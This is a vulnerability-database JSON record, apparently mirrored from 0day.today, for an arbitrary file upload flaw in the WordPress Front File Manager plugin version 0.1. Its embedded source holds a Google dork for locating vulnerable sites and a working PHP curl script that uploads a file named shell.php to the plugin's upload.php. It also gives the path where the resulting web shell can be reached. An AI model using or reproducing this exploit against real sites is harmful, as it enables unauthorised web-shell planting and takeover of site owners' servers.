DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-18525", "type": "zdt", "bulletinFamily": "exploit", "title": "Wordpress Front File Manager Plugin 0.1 Arbitrary File Upload", "description": "Exploit for php platform in category web applications", "published": "2012-06-08T00:00:00", "modified": "2012-06-08T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/18525", "reporter": "Adrien Thierry", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-16T05:10:02", "viewCount": 15, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/18525", "sourceData": "# Exploit Title: Wordpress front file manager 0.1 Arbitrary File Upload\r\n# Google Dork: inurl:wp-content/plugins/front-file-manager/\r\n# Exploit Author: Adrien Thierry\r\n# adrien dot thierryfr at gmail dot com\r\n# Vendor Homepage: http://www.webikon.sk/en\r\n# Software Link: http://downloads.wordpress.org/plugin/front-file-manager.zip\r\n# Version: 0.1\r\n \r\nPage upload.php is vulnerable to Remote File Upload. Code :\r\n \r\n<?php\r\n$u=\"whatyouwant.php\";\r\n$c = curl_init(\"http://site.com/wp-content/plugins/front-file-manager/upload.php\");\r\ncurl_setopt($c, CURLOPT_POST, true);\r\ncurl_setopt($c, CURLOPT_POSTFIELDS,\r\narray('file'=>\"@$u\",\r\n'name'=>\"shell.php\"));\r\ncurl_setopt($c, CURLOPT_RETURNTRANSFER, 1);\r\n$e = curl_exec($c);\r\ncurl_close($c);\r\necho $e;\r\n?>\r\n \r\n \r\n \r\nShell could be found at :\r\n http://site.com/wp-content/plugins/uploads/2012/06/shell.php\r\n (http://site.com/wp-content/plugins/uploads/[YYYY]/[MM]/shell.php\r\n \r\n#########################################################################################\r\n\r\n\n\n# 0day.today [2018-02-16] #", "_state": {"dependencies": 1645376749, "score": 1659766679, "epss": 1678812679}}

{}